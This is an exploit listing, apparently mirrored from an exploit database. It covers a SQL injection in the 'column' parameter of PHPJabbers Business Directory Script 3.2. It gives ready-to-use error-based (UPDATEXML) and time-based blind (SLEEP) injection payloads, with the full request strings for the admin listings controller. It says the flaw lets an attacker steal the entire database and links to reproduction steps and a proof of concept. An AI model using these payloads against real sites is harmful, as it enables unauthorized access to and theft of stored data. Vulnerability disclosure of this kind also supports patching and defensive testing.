Exploit for Business Directory Script 3.2 SQL Injection

Name: Exploit for Business Directory Script 3.2 SQL Injection
Rating: 5 (167 reviews)
2023-08-25 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:174327
## Title: Business-Directory-Script-3.2 SQLi  
## Author: nu11secur1ty  
## Date: 08/25/2023  
## Vendor: https://www.phpjabbers.com/  
## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The `column` parameter appears to be vulnerable to SQL injection  
attacks. The payload ' was submitted in the column parameter, and a  
database error message was returned. You should review the contents of  
the error message, and the application's handling of other input, to  
confirm whether a vulnerability is present. Additionally, the payload  
(select*from(select(sleep(20)))a) was submitted in the column  
parameter. The application took 20271 milliseconds to respond to the  
request, compared with 230 milliseconds for the original request,  
indicating that the injected SQL command caused a time delay. The  
attacker can steal all information from the database of the server of  
this application!  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: column (GET)  
Type: error-based  
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)  
Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT  
(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)  
Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT  
6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)  
  
## Time spend:  
01:35:00